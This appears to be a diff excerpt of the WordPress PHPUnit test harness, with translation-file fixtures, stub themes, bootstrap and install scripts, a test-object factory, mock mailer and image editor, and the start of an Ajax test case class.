Description: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong: Hello, Dolly. When activated you will randomly see a lyric from <cite>Hello, Dolly</cite> in the upper right of your admin screen on every page.
Author: Matt Mullenweg
Version: 1.5.1
Author URI: http://ma.tt/
Text Domain: hello-dolly
*/
// Test for
?>

BIN
tests/data/pomo/bad_nplurals.mo Normal file
View File

Binary file not shown.

18
tests/data/pomo/bad_nplurals.po Normal file
View File

@ -0,0 +1,18 @@
msgid ""
msgstr ""
"Project-Id-Version: bbPress 1.0.4 alpha\n"
"POT-Creation-Date: \n"
"PO-Revision-Date: 2008-12-26 17:07+0100\n"
"Last-Translator: Fernando Tellado <fernando.tellado@gmail.com>\n"
"Language-Team: ayudawordpress.com <admin@ayudawordpress.com>\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=utf-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-Language: spanish\n"
"X-Poedit-Country: spain\n"
"Plural-Forms: nplurals=2; plural=n !=1;\\n\n"
msgid "%d forum"
msgid_plural "%d forums"
msgstr[0] "%d foro"
msgstr[1] "%d foros"

BIN
tests/data/pomo/context.mo Normal file
View File

Binary file not shown.

BIN
tests/data/pomo/de_DE-2.8.mo Normal file
View File

Binary file not shown.

0
tests/data/pomo/empty.po Normal file
View File

25
tests/data/pomo/mo.pot Normal file
View File

@ -0,0 +1,25 @@
# SOME DESCRIPTIVE TITLE.
# Copyright (C) YEAR WordPress
# This file is distributed under the same license as the PACKAGE package.
# FIRST AUTHOR <EMAIL@ADDRESS>, YEAR.
#
#, fuzzy
msgid ""
msgstr ""
"Project-Id-Version: PACKAGE VERSION\n"
"Report-Msgid-Bugs-To: wp-polyglots@lists.automattic.com\n"
"POT-Creation-Date: 2009-06-28 11:07+0000\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n"
"Last-Translator: FULL NAME <EMAIL@ADDRESS>\n"
"Language-Team: LANGUAGE <LL@li.org>\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=CHARSET\n"
"Content-Transfer-Encoding: 8bit\n"
#: wp-admin/includes/continents-cities.php:7
msgid "Africa"
msgstr ""
#: wp-admin/includes/continents-cities.php:8
msgid "Abidjan"
msgstr ""

BIN
tests/data/pomo/overload.mo Normal file
View File

Binary file not shown.

BIN
tests/data/pomo/plural.mo Normal file
View File

Binary file not shown.

BIN
tests/data/pomo/simple.mo Normal file
View File

Binary file not shown.

54
tests/data/pomo/simple.po Normal file
View File

@ -0,0 +1,54 @@
msgid ""
msgstr ""
"Project-Id-Version: WordPress 2.6-bleeding\n"
"Plural-Forms: nplurals=2; plural=n != 1;\n"
msgid "moon"
msgstr ""
msgctxt "brum"
msgid "strut"
msgid_plural "struts"
msgstr[0] "ztrut0"
msgstr[1] "ztrut1"
msgstr[2] "ztrut2"
msgid ""
"The first thing you need to do is tell Blogger to let WordPress access your "
"account. You will be sent back here after providing authorization."
msgstr "baba\n"
"dyado"
"gugu"
msgctxt ""
"con"
"text"
msgid ""
"sing"
"ular"
msgid_plural ""
"plu"
"ral"
msgstr[0] ""
"trans"
"lation0"
msgstr[1] ""
"trans"
"lation1"
msgstr[2] ""
"translation2"
# baba
#: wp-admin/x.php:111 baba:333
#. translators: buuu
# brubru
#, fuzzy
#: baba
msgid "a"
msgstr ""
msgid "a\""
msgstr ""

7
tests/data/pomo/windows-line-endings.po Normal file
View File

@ -0,0 +1,7 @@
msgid ""
msgstr ""
"Project-Id-Version: Windows 3.11\n"
"Plural-Forms: nplurals=2; plural=n != 1;\n"
msgid "moon"
msgstr "yuhu"

7
tests/data/themedir1/default/functions.php Normal file
View File

@ -0,0 +1,7 @@
<?php
// dummy theme
echo dirname(__FILE__).'/'.basename(__FILE__);
?>

7
tests/data/themedir1/default/index.php Normal file
View File

@ -0,0 +1,7 @@
<?php
// dummy theme
echo dirname(__FILE__).'/'.basename(__FILE__);
?>

17
tests/data/themedir1/default/style.css Normal file
View File

@ -0,0 +1,17 @@
/*
Theme Name: WordPress Default
Theme URI: http://wordpress.org/
Description: The default WordPress theme based on the famous <a href="http://binarybonsai.com/kubrick/">Kubrick</a>.
Version: 1.6
Author: Michael Heilemann
Author URI: http://binarybonsai.com/
Kubrick v1.5
http://binarybonsai.com/kubrick/
This is just a stub to test the loading of the above metadata.
*/

3
tests/data/themedir1/page-templates/index.php Normal file
View File

@ -0,0 +1,3 @@
<?php
// Intentionally left blank
?>

11
tests/data/themedir1/page-templates/style.css Normal file
View File

@ -0,0 +1,11 @@
/*
Theme Name: Page Template Theme
Theme URI: http://example.org/
Description: An example theme with page templates
Version: 0.1
Author: Mr. WordPress
Author URI: http://wordpress.org/
This is just a stub to test the loading of the above metadata.
*/

5
tests/data/themedir1/page-templates/subdir/template-sub-dir.php Normal file
View File

@ -0,0 +1,5 @@
<?php
/*
Template Name: Sub Dir
*/
?>

1
tests/data/themedir1/page-templates/template-header.php Normal file
View File

@ -0,0 +1 @@
<?php // Template Name: This Template Header Is On One Line ?>

5
tests/data/themedir1/page-templates/template-top-level.php Normal file
View File

@ -0,0 +1,5 @@
<?php
/*
Template Name: Top Level
*/
?>

7
tests/data/themedir1/sandbox/functions.php Normal file
View File

@ -0,0 +1,7 @@
<?php
// dummy theme
echo dirname(__FILE__).'/'.basename(__FILE__);
?>

7
tests/data/themedir1/sandbox/index.php Normal file
View File

@ -0,0 +1,7 @@
<?php
// dummy theme
echo dirname(__FILE__).'/'.basename(__FILE__);
?>

11
tests/data/themedir1/sandbox/style.css Normal file
View File

@ -0,0 +1,11 @@
/*
THEME NAME: Sandbox
THEME URI: http://www.plaintxt.org/themes/sandbox/
DESCRIPTION: A theme with powerful, semantic CSS selectors and the ability to add new skins.
VERSION: 0.6.1-wpcom
AUTHOR: <a href="http://andy.wordpress.com/">Andy Skelton</a> &amp; <a href="http://www.plaintxt.org/">Scott Allan Wallick</a>
AUTHOR URI:
This is a dummy theme for testing the above metadata.
*/

14
tests/data/themedir1/stylesheetonly/style.css Normal file
View File

@ -0,0 +1,14 @@
/*
Theme Name: Stylesheet Only
Theme URI: http://www.example.com/blog/
Description: A three-column widget-ready theme in dark blue.
Version: 1.0
Author: Henry Crun
Author URI: http://www.example.com/
template: sandbox
This is a dummy theme for testing the above metadata.
*/

1
tests/data/themedir1/subdir/theme with spaces/index.php Normal file
View File

@ -0,0 +1 @@
<?php

11
tests/data/themedir1/subdir/theme with spaces/style.css Normal file
View File

@ -0,0 +1,11 @@
/*
Theme Name: Theme with Spaces in the Directory
Theme URI: http://example.org/
Description: An example theme in a sub directory
Version: 0.1
Author: Mr. WordPress
Author URI: http://wordpress.org/
This is just a stub to test the loading of the above metadata.
*/

3
tests/data/themedir1/subdir/theme2/functions.php Normal file
View File

@ -0,0 +1,3 @@
<?php
?>

3
tests/data/themedir1/subdir/theme2/index.php Normal file
View File

@ -0,0 +1,3 @@
<?php
?>

11
tests/data/themedir1/subdir/theme2/style.css Normal file
View File

@ -0,0 +1,11 @@
/*
Theme Name: My Subdir Theme
Theme URI: http://example.org/
Description: An example theme in a sub directory
Version: 0.1
Author: Mr. WordPress
Author URI: http://wordpress.org/
This is just a stub to test the loading of the above metadata.
*/

7
tests/data/themedir1/theme1-dupe/functions.php Normal file
View File

@ -0,0 +1,7 @@
<?php
// dummy theme
echo dirname(__FILE__).'/'.basename(__FILE__);
?>

7
tests/data/themedir1/theme1-dupe/index.php Normal file
View File

@ -0,0 +1,7 @@
<?php
// dummy theme
echo dirname(__FILE__).'/'.basename(__FILE__);
?>

17
tests/data/themedir1/theme1-dupe/style.css Normal file
View File

@ -0,0 +1,17 @@
/*
Theme Name: My Theme
Theme URI: http://example.org/
Description: This theme has the same Theme Name as theme1
Version: 1.4
Author: Minnie Bannister
Author URI: http://example.com/
Kubrick v1.5
http://binarybonsai.com/kubrick/
This is just a stub to test the loading of the above metadata.
*/

7
tests/data/themedir1/theme1/functions.php Normal file
View File

@ -0,0 +1,7 @@
<?php
// dummy theme
echo dirname(__FILE__).'/'.basename(__FILE__);
?>

7
tests/data/themedir1/theme1/index.php Normal file
View File

@ -0,0 +1,7 @@
<?php
// dummy theme
echo dirname(__FILE__).'/'.basename(__FILE__);
?>

17
tests/data/themedir1/theme1/style.css Normal file
View File

@ -0,0 +1,17 @@
/*
Theme Name: My Theme
Theme URI: http://example.org/
Description: An example theme
Version: 1.3
Author: Minnie Bannister
Author URI: http://example.com/
Kubrick v1.5
http://binarybonsai.com/kubrick/
This is just a stub to test the loading of the above metadata.
*/

136
tests/includes/bootstrap.php Normal file
View File

@ -0,0 +1,136 @@
<?php
/**
* Installs WordPress for running the tests and loads WordPress and the test libraries
*/
require_once 'PHPUnit/Autoload.php';
$config_file_path = dirname( __FILE__ ) . '/../wp-tests-config.php';
/*
* Globalize some WordPress variables, because PHPUnit loads this file inside a function
* See: https://github.com/sebastianbergmann/phpunit/issues/325
*
* These are not needed for WordPress 3.3+, only for older versions
*/
global $table_prefix, $wp_embed, $wp_locale, $_wp_deprecated_widgets_callbacks, $wp_widget_factory;
// These are still needed
global $wpdb, $current_site, $current_blog, $wp_rewrite, $shortcode_tags, $wp, $phpmailer;
if ( !is_readable( $config_file_path ) ) {
die( "ERROR: wp-tests-config.php is missing! Please use wp-tests-config-sample.php to create a config file.\n" );
}
require_once $config_file_path;
define( 'DIR_TESTDATA', dirname( __FILE__ ) . '/../data' );
if ( ! defined( 'WP_TESTS_FORCE_KNOWN_BUGS' ) )
define( 'WP_TESTS_FORCE_KNOWN_BUGS', false );
// Cron tries to make an HTTP request to the blog, which always fails, because tests are run in CLI mode only
define( 'DISABLE_WP_CRON', true );
define( 'WP_MEMORY_LIMIT', -1 );
define( 'WP_MAX_MEMORY_LIMIT', -1 );
$_SERVER['SERVER_PROTOCOL'] = 'HTTP/1.1';
$_SERVER['HTTP_HOST'] = WP_TESTS_DOMAIN;
$PHP_SELF = $GLOBALS['PHP_SELF'] = $_SERVER['PHP_SELF'] = '/index.php';
if ( "1" == getenv( 'WP_MULTISITE' ) ||
( defined( 'WP_TESTS_MULTISITE') && WP_TESTS_MULTISITE ) ) {
$multisite = true;
} else {
$multisite = false;
}
// Override the PHPMailer
require_once( dirname( __FILE__ ) . '/mock-mailer.php' );
$phpmailer = new MockPHPMailer();
system( WP_PHP_BINARY . ' ' . escapeshellarg( dirname( __FILE__ ) . '/install.php' ) . ' ' . escapeshellarg( $config_file_path ) . ' ' . $multisite );
if ( $multisite ) {
echo "Running as multisite..." . PHP_EOL;
define( 'MULTISITE', true );
define( 'SUBDOMAIN_INSTALL', false );
define( 'DOMAIN_CURRENT_SITE', WP_TESTS_DOMAIN );
define( 'PATH_CURRENT_SITE', '/' );
define( 'SITE_ID_CURRENT_SITE', 1 );
define( 'BLOG_ID_CURRENT_SITE', 1 );
$GLOBALS['base'] = '/';
} else {
echo "Running as single site... To run multisite, use -c multisite.xml" . PHP_EOL;
}
unset( $multisite );
require_once dirname( __FILE__ ) . '/functions.php';
// Preset WordPress options defined in bootstrap file.
// Used to activate themes, plugins, as well as other settings.
if(isset($GLOBALS['wp_tests_options'])) {
function wp_tests_options( $value ) {
$key = substr( current_filter(), strlen( 'pre_option_' ) );
return $GLOBALS['wp_tests_options'][$key];
}
foreach ( array_keys( $GLOBALS['wp_tests_options'] ) as $key ) {
tests_add_filter( 'pre_option_'.$key, 'wp_tests_options' );
}
}
// Load WordPress
require_once ABSPATH . '/wp-settings.php';
// Delete any default posts & related data
_delete_all_posts();
require dirname( __FILE__ ) . '/testcase.php';
require dirname( __FILE__ ) . '/testcase-xmlrpc.php';
require dirname( __FILE__ ) . '/testcase-ajax.php';
require dirname( __FILE__ ) . '/exceptions.php';
require dirname( __FILE__ ) . '/utils.php';
/**
* A child class of the PHP test runner.
*
* Not actually used as a runner. Rather, used to access the protected
* longOptions property, to parse the arguments passed to the script.
*
* If it is determined that phpunit was called with a --group that corresponds
* to an @ticket annotation (such as `phpunit --group 12345` for bugs marked
* as #WP12345), then it is assumed that known bugs should not be skipped.
*
* If WP_TESTS_FORCE_KNOWN_BUGS is already set in wp-tests-config.php, then
* how you call phpunit has no effect.
*/
class WP_PHPUnit_TextUI_Command extends PHPUnit_TextUI_Command {
function __construct( $argv ) {
$options = PHPUnit_Util_Getopt::getopt(
$argv,
'd:c:hv',
array_keys( $this->longOptions )
);
$ajax_message = true;
foreach ( $options[0] as $option ) {
switch ( $option[0] ) {
case '--exclude-group' :
$ajax_message = false;
continue 2;
case '--group' :
$groups = explode( ',', $option[1] );
foreach ( $groups as $group ) {
if ( is_numeric( $group ) || preg_match( '/^(UT|Plugin)\d+$/', $group ) )
WP_UnitTestCase::forceTicket( $group );
}
$ajax_message = ! in_array( 'ajax', $groups );
continue 2;
}
}
if ( $ajax_message )
echo "Not running ajax tests... To execute these, use --group ajax." . PHP_EOL;
}
}
new WP_PHPUnit_TextUI_Command( $_SERVER['argv'] );

33
tests/includes/exceptions.php Normal file
View File

@ -0,0 +1,33 @@
<?php
class WP_Tests_Exception extends PHPUnit_Framework_Exception {
}
/**
* General exception for wp_die()
*/
class WPDieException extends Exception {}
/**
* Exception for cases of wp_die(), for ajax tests.
* This means there was an error (no output, and a call to wp_die)
*
* @package WordPress
* @subpackage Unit Tests
* @since 3.4.0
*/
class WPAjaxDieStopException extends WPDieException {}
/**
* Exception for cases of wp_die(), for ajax tests.
* This means execution of the ajax function should be halted, but the unit
* test can continue. The function finished normally and there was not an
* error (output happened, but wp_die was called to end execution) This is
* used with WP_Ajax_Response::send
*
* @package WordPress
* @subpackage Unit Tests
* @since 3.4.0
*/
class WPAjaxDieContinueException extends WPDieException {}

344
tests/includes/factory.php Normal file
View File

@ -0,0 +1,344 @@
<?php
class WP_UnitTest_Factory {
/**
* @var WP_UnitTest_Factory_For_Post
*/
public $post;
/**
* @var WP_UnitTest_Factory_For_Attachment
*/
public $attachment;
/**
* @var WP_UnitTest_Factory_For_Comment
*/
public $comment;
/**
* @var WP_UnitTest_Factory_For_User
*/
public $user;
/**
* @var WP_UnitTest_Factory_For_Term
*/
public $term;
/**
* @var WP_UnitTest_Factory_For_Term
*/
public $category;
/**
* @var WP_UnitTest_Factory_For_Term
*/
public $tag;
/**
* @var WP_UnitTest_Factory_For_Blog
*/
public $blog;
function __construct() {
$this->post = new WP_UnitTest_Factory_For_Post( $this );
$this->attachment = new WP_UnitTest_Factory_For_Attachment( $this );
$this->comment = new WP_UnitTest_Factory_For_Comment( $this );
$this->user = new WP_UnitTest_Factory_For_User( $this );
$this->term = new WP_UnitTest_Factory_For_Term( $this );
$this->category = new WP_UnitTest_Factory_For_Term( $this, 'category' );
$this->tag = new WP_UnitTest_Factory_For_Term( $this, 'post_tag' );
if ( is_multisite() )
$this->blog = new WP_UnitTest_Factory_For_Blog( $this );
}
}
class WP_UnitTest_Factory_For_Post extends WP_UnitTest_Factory_For_Thing {
function __construct( $factory = null ) {
parent::__construct( $factory );
$this->default_generation_definitions = array(
'post_status' => 'publish',
'post_title' => new WP_UnitTest_Generator_Sequence( 'Post title %s' ),
'post_content' => new WP_UnitTest_Generator_Sequence( 'Post content %s' ),
'post_excerpt' => new WP_UnitTest_Generator_Sequence( 'Post excerpt %s' ),
'post_type' => 'post'
);
}
function create_object( $args ) {
return wp_insert_post( $args );
}
function update_object( $post_id, $fields ) {
$fields['ID'] = $post_id;
return wp_update_post( $fields );
}
function get_object_by_id( $post_id ) {
return get_post( $post_id );
}
}
class WP_UnitTest_Factory_For_Attachment extends WP_UnitTest_Factory_For_Post {
function create_object( $file, $parent = 0, $args = array() ) {
return wp_insert_attachment( $args, $file, $parent );
}
}
class WP_UnitTest_Factory_For_User extends WP_UnitTest_Factory_For_Thing {
function __construct( $factory = null ) {
parent::__construct( $factory );
$this->default_generation_definitions = array(
'user_login' => new WP_UnitTest_Generator_Sequence( 'User %s' ),
'user_pass' => 'password',
'user_email' => new WP_UnitTest_Generator_Sequence( 'user_%s@example.org' ),
);
}
function create_object( $args ) {
return wp_insert_user( $args );
}
function update_object( $user_id, $fields ) {
$fields['ID'] = $user_id;
return wp_update_user( $fields );
}
function get_object_by_id( $user_id ) {
return new WP_User( $user_id );
}
}
class WP_UnitTest_Factory_For_Comment extends WP_UnitTest_Factory_For_Thing {
function __construct( $factory = null ) {
parent::__construct( $factory );
$this->default_generation_definitions = array(
'comment_author' => new WP_UnitTest_Generator_Sequence( 'Commenter %s' ),
'comment_author_url' => new WP_UnitTest_Generator_Sequence( 'http://example.com/%s/' ),
'comment_approved' => 1,
);
}
function create_object( $args ) {
return wp_insert_comment( $this->addslashes_deep( $args ) );
}
function update_object( $comment_id, $fields ) {
$fields['comment_ID'] = $comment_id;
return wp_update_comment( $this->addslashes_deep( $fields ) );
}
function create_post_comments( $post_id, $count = 1, $args = array(), $generation_definitions = null ) {
$args['comment_post_ID'] = $post_id;
return $this->create_many( $count, $args, $generation_definitions );
}
function get_object_by_id( $comment_id ) {
return get_comment( $comment_id );
}
}
class WP_UnitTest_Factory_For_Blog extends WP_UnitTest_Factory_For_Thing {
function __construct( $factory = null ) {
global $current_site, $base;
parent::__construct( $factory );
$this->default_generation_definitions = array(
'domain' => $current_site->domain,
'path' => new WP_UnitTest_Generator_Sequence( $base . 'testpath%s' ),
'title' => new WP_UnitTest_Generator_Sequence( 'Site %s' ),
'site_id' => $current_site->id,
);
}
function create_object( $args ) {
$meta = isset( $args['meta'] ) ? $args['meta'] : array();
$user_id = isset( $args['user_id'] ) ? $args['user_id'] : get_current_user_id();
return wpmu_create_blog( $args['domain'], $args['path'], $args['title'], $user_id, $meta, $args['site_id'] );
}
function update_object( $blog_id, $fields ) {}
function get_object_by_id( $blog_id ) {
return get_blog_details( $blog_id, false );
}
}
class WP_UnitTest_Factory_For_Term extends WP_UnitTest_Factory_For_Thing {
private $taxonomy;
const DEFAULT_TAXONOMY = 'post_tag';
function __construct( $factory = null, $taxonomy = null ) {
parent::__construct( $factory );
$this->taxonomy = $taxonomy ? $taxonomy : self::DEFAULT_TAXONOMY;
$this->default_generation_definitions = array(
'name' => new WP_UnitTest_Generator_Sequence( 'Term %s' ),
'taxonomy' => $this->taxonomy,
'description' => new WP_UnitTest_Generator_Sequence( 'Term description %s' ),
);
}
function create_object( $args ) {
$args = array_merge( array( 'taxonomy' => $this->taxonomy ), $args );
$term_id_pair = wp_insert_term( $args['name'], $args['taxonomy'], $args );
if ( is_wp_error( $term_id_pair ) )
return $term_id_pair;
return $term_id_pair['term_id'];
}
function update_object( $term, $fields ) {
$fields = array_merge( array( 'taxonomy' => $this->taxonomy ), $fields );
if ( is_object( $term ) )
$taxonomy = $term->taxonomy;
$term_id_pair = wp_update_term( $term, $taxonomy, $fields );
return $term_id_pair['term_id'];
}
function add_post_terms( $post_id, $terms, $taxonomy, $append = true ) {
return wp_set_post_terms( $post_id, $terms, $taxonomy, $append );
}
function get_object_by_id( $term_id ) {
return get_term( $term_id, $this->taxonomy );
}
}
abstract class WP_UnitTest_Factory_For_Thing {
var $default_generation_definitions;
var $factory;
/**
* Creates a new factory, which will create objects of a specific Thing
*
* @param object $factory Global factory that can be used to create other objects on the system
* @param array $default_generation_definitions Defines what default values should the properties of the object have. The default values
* can be generators -- an object with next() method. There are some default generators: {@link WP_UnitTest_Generator_Sequence},
* {@link WP_UnitTest_Generator_Locale_Name}, {@link WP_UnitTest_Factory_Callback_After_Create}.
*/
function __construct( $factory, $default_generation_definitions = array() ) {
$this->factory = $factory;
$this->default_generation_definitions = $default_generation_definitions;
}
abstract function create_object( $args );
abstract function update_object( $object, $fields );
function create( $args = array(), $generation_definitions = null ) {
if ( is_null( $generation_definitions ) )
$generation_definitions = $this->default_generation_definitions;
$generated_args = $this->generate_args( $args, $generation_definitions, $callbacks );
$created = $this->create_object( $generated_args );
if ( !$created || is_wp_error( $created ) )
return $created;
if ( $callbacks ) {
$updated_fields = $this->apply_callbacks( $callbacks, $created );
$save_result = $this->update_object( $created, $updated_fields );
if ( !$save_result || is_wp_error( $save_result ) )
return $save_result;
}
return $created;
}
function create_and_get( $args = array(), $generation_definitions = null ) {
$object_id = $this->create( $args, $generation_definitions );
return $this->get_object_by_id( $object_id );
}
abstract function get_object_by_id( $object_id );
function create_many( $count, $args = array(), $generation_definitions = null ) {
$results = array();
for ( $i = 0; $i < $count; $i++ ) {
$results[] = $this->create( $args, $generation_definitions );
}
return $results;
}
function generate_args( $args = array(), $generation_definitions = null, &$callbacks = null ) {
$callbacks = array();
if ( is_null( $generation_definitions ) )
$generation_definitions = $this->default_generation_definitions;
foreach( array_keys( $generation_definitions ) as $field_name ) {
if ( !isset( $args[$field_name] ) ) {
$generator = $generation_definitions[$field_name];
if ( is_scalar( $generator ) )
$args[$field_name] = $generator;
elseif ( is_object( $generator ) && method_exists( $generator, 'call' ) ) {
$callbacks[$field_name] = $generator;
} elseif ( is_object( $generator ) )
$args[$field_name] = $generator->next();
else
return new WP_Error( 'invalid_argument', 'Factory default value should be either a scalar or an generator object.' );
}
}
return $args;
}
function apply_callbacks( $callbacks, $created ) {
$updated_fields = array();
foreach( $callbacks as $field_name => $generator ) {
$updated_fields[$field_name] = $generator->call( $created );
}
return $updated_fields;
}
function callback( $function ) {
return new WP_UnitTest_Factory_Callback_After_Create( $function );
}
function addslashes_deep($value) {
if ( is_array( $value ) ) {
$value = array_map( array( $this, 'addslashes_deep' ), $value );
} elseif ( is_object( $value ) ) {
$vars = get_object_vars( $value );
foreach ($vars as $key=>$data) {
$value->{$key} = $this->addslashes_deep( $data );
}
} elseif ( is_string( $value ) ) {
$value = addslashes( $value );
}
return $value;
}
}
class WP_UnitTest_Generator_Sequence {
var $next;
var $template_string;
function __construct( $template_string = '%s', $start = 1 ) {
$this->next = $start;
$this->template_string = $template_string;
}
function next() {
$generated = sprintf( $this->template_string , $this->next );
$this->next++;
return $generated;
}
}
class WP_UnitTest_Factory_Callback_After_Create {
var $callback;
function __construct( $callback ) {
$this->callback = $callback;
}
function call( $object ) {
return call_user_func( $this->callback, $object );
}
}

44
tests/includes/functions.php Normal file
View File

@ -0,0 +1,44 @@
<?php
// For adding hooks before loading WP
function tests_add_filter($tag, $function_to_add, $priority = 10, $accepted_args = 1) {
global $wp_filter, $merged_filters;
$idx = _test_filter_build_unique_id($tag, $function_to_add, $priority);
$wp_filter[$tag][$priority][$idx] = array('function' => $function_to_add, 'accepted_args' => $accepted_args);
unset( $merged_filters[ $tag ] );
return true;
}
function _test_filter_build_unique_id($tag, $function, $priority) {
global $wp_filter;
static $filter_id_count = 0;
if ( is_string($function) )
return $function;
if ( is_object($function) ) {
// Closures are currently implemented as objects
$function = array( $function, '' );
} else {
$function = (array) $function;
}
if (is_object($function[0]) ) {
return spl_object_hash($function[0]) . $function[1];
} else if ( is_string($function[0]) ) {
// Static Calling
return $function[0].$function[1];
}
}
function _delete_all_posts() {
global $wpdb;
$all_posts = $wpdb->get_col("SELECT ID from {$wpdb->posts}");
if ($all_posts) {
foreach ($all_posts as $id)
wp_delete_post( $id, true );
}
}

67
tests/includes/install.php Normal file
View File

@ -0,0 +1,67 @@
<?php
/**
* Installs WordPress for the purpose of the unit-tests
*
* @todo Reuse the init/load code in init.php
*/
error_reporting( E_ALL & ~E_DEPRECATED & ~E_STRICT );
$config_file_path = $argv[1];
$multisite = ! empty( $argv[2] );
define( 'WP_INSTALLING', true );
require_once $config_file_path;
require_once dirname( __FILE__ ) . '/functions.php';
$_SERVER['SERVER_PROTOCOL'] = 'HTTP/1.1';
$_SERVER['HTTP_HOST'] = WP_TESTS_DOMAIN;
$PHP_SELF = $GLOBALS['PHP_SELF'] = $_SERVER['PHP_SELF'] = '/index.php';
require_once ABSPATH . '/wp-settings.php';
require_once ABSPATH . '/wp-admin/includes/upgrade.php';
require_once ABSPATH . '/wp-includes/wp-db.php';
define( 'WP_TESTS_VERSION_FILE', ABSPATH . '.wp-tests-version' );
$wpdb->suppress_errors();
$installed = $wpdb->get_var( "SELECT option_value FROM $wpdb->options WHERE option_name = 'siteurl'" );
$wpdb->suppress_errors( false );
$hash = get_option( 'db_version' ) . ' ' . (int) $multisite . ' ' . sha1_file( $config_file_path );
if ( $installed && file_exists( WP_TESTS_VERSION_FILE ) && file_get_contents( WP_TESTS_VERSION_FILE ) == $hash )
return;
$wpdb->query( 'SET storage_engine = INNODB' );
$wpdb->select( DB_NAME, $wpdb->dbh );
echo "Installing..." . PHP_EOL;
foreach ( $wpdb->tables() as $table => $prefixed_table ) {
$wpdb->query( "DROP TABLE IF EXISTS $prefixed_table" );
}
foreach ( $wpdb->tables( 'ms_global' ) as $table => $prefixed_table ) {
$wpdb->query( "DROP TABLE IF EXISTS $prefixed_table" );
// We need to create references to ms global tables.
if ( $multisite )
$wpdb->$table = $prefixed_table;
}
wp_install( WP_TESTS_TITLE, 'admin', WP_TESTS_EMAIL, true, null, 'password' );
if ( $multisite ) {
echo "Installing network..." . PHP_EOL;
define( 'WP_INSTALLING_NETWORK', true );
$title = WP_TESTS_TITLE . ' Network';
$subdomain_install = false;
install_network();
populate_network( 1, WP_TESTS_DOMAIN, WP_TESTS_EMAIL, $title, '/', $subdomain_install );
}
file_put_contents( WP_TESTS_VERSION_FILE, $hash );

43
tests/includes/mock-image-editor.php Normal file
View File

@ -0,0 +1,43 @@
<?php
if (class_exists( 'WP_Image_Editor' ) ) :
class WP_Image_Editor_Mock extends WP_Image_Editor {
public static $load_return = true;
public static $test_return = true;
public static $save_return = array();
public function load() {
return self::$load_return;
}
public static function test() {
return self::$test_return;
}
public static function supports_mime_type( $mime_type ) {
return true;
}
public function resize( $max_w, $max_h, $crop = false ) {
}
public function multi_resize( $sizes ) {
}
public function crop( $src_x, $src_y, $src_w, $src_h, $dst_w = null, $dst_h = null, $src_abs = false ) {
}
public function rotate( $angle ) {
}
public function flip( $horz, $vert ) {
}
public function save( $destfilename = null, $mime_type = null ) {
return self::$save_return;
}
public function stream( $mime_type = null ) {
}
}
endif;

26
tests/includes/mock-mailer.php Normal file
View File

@ -0,0 +1,26 @@
<?php
require_once( ABSPATH . '/wp-includes/class-phpmailer.php' );
class MockPHPMailer extends PHPMailer {
var $mock_sent = array();
// override the Send function so it doesn't actually send anything
function Send() {
try {
if ( ! $this->PreSend() )
return false;
$this->mock_sent[] = array(
'to' => $this->to,
'cc' => $this->cc,
'bcc' => $this->bcc,
'header' => $this->MIMEHeader,
'body' => $this->MIMEBody,
);
return true;
} catch ( phpmailerException $e ) {
return false;
}
}
}

182
tests/includes/testcase-ajax.php Normal file
View File

@ -0,0 +1,182 @@
<?php
/**
* Ajax test cases
*
* @package WordPress
* @subpackage UnitTests
* @since 3.4.0
*/
/**
* Ajax test case class
*
* @package WordPress
* @subpackage UnitTests
* @since 3.4.0
*/
abstract class WP_Ajax_UnitTestCase extends WP_UnitTestCase {
/**
* Last AJAX response. This is set via echo -or- wp_die.
* @var type
*/
protected $_last_response = '';
/**
* List of ajax actions called via POST
* @var type
*/
protected $_core_actions_get = array( 'fetch-list', 'ajax-tag-search', 'wp-compression-test', 'imgedit-preview', 'oembed_cache' );
/**
* Saved error reporting level
* @var int
*/
protected $_error_level = 0;
/**
* List of ajax actions called via GET
* @var type
*/
protected $_core_actions_post = array(
'oembed_cache', 'image-editor', 'delete-comment', 'delete-tag', 'delete-link',
'delete-meta', 'delete-post', 'trash-post', 'untrash-post', 'delete-page', 'dim-comment',
'add-link-category', 'add-tag', 'get-tagcloud', 'get-comments', 'replyto-comment',
'edit-comment', 'add-menu-item', 'add-meta', 'add-user', 'autosave', 'closed-postboxes',
'hidden-columns', 'update-welcome-panel', 'menu-get-metabox', 'wp-link-ajax',
'menu-locations-save', 'menu-quick-search', 'meta-box-order', 'get-permalink',
'sample-permalink', 'inline-save', 'inline-save-tax', 'find_posts', 'widgets-order',
'save-widget', 'set-post-thumbnail', 'date_format', 'time_format', 'wp-fullscreen-save-post',
'wp-remove-post-lock', 'dismiss-wp-pointer', 'nopriv_autosave'
);
/**
* Set up the test fixture.
* Override wp_die(), pretend to be ajax, and suppres E_WARNINGs
*/
public function setUp() {
parent::setUp();
// Register the core actions
foreach ( array_merge( $this->_core_actions_get, $this->_core_actions_post ) as $action )
if ( function_exists( 'wp_ajax_' . str_replace( '-', '_', $action ) ) )
add_action( 'wp_ajax_' . $action, 'wp_ajax_' . str_replace( '-', '_', $action ), 1 );
add_filter( 'wp_die_ajax_handler', array( $this, 'getDieHandler' ), 1, 1 );
if ( !defined( 'DOING_AJAX' ) )
define( 'DOING_AJAX', true );
set_current_screen( 'ajax' );
// Clear logout cookies
add_action( 'clear_auth_cookie', array( $this, 'logout' ) );
// Suppress warnings from "Cannot modify header information - headers already sent by"
$this->_error_level = error_reporting();
error_reporting( $this->_error_level & ~E_WARNING );
// Make some posts
$this->factory->post->create_many( 5 );
}
/**
* Tear down the test fixture.
* Reset $_POST, remove the wp_die() override, restore error reporting
*/
public function tearDown() {
parent::tearDown();
$_POST = array();
$_GET = array();
unset( $GLOBALS['post'] );
unset( $GLOBALS['comment'] );
remove_filter( 'wp_die_ajax_handler', array( $this, 'getDieHandler' ), 1, 1 );
remove_action( 'clear_auth_cookie', array( $this, 'logout' ) );
error_reporting( $this->_error_level );
set_current_screen( 'front' );
}
/**
* Clear login cookies, unset the current user
*/
public function logout() {
unset( $GLOBALS['current_user'] );
$cookies = array(AUTH_COOKIE, SECURE_AUTH_COOKIE, LOGGED_IN_COOKIE, USER_COOKIE, PASS_COOKIE);
foreach ( $cookies as $c )
unset( $_COOKIE[$c] );
}
/**
* Return our callback handler
* @return callback
*/
public function getDieHandler() {
return array( $this, 'dieHandler' );
}
/**
* Handler for wp_die()
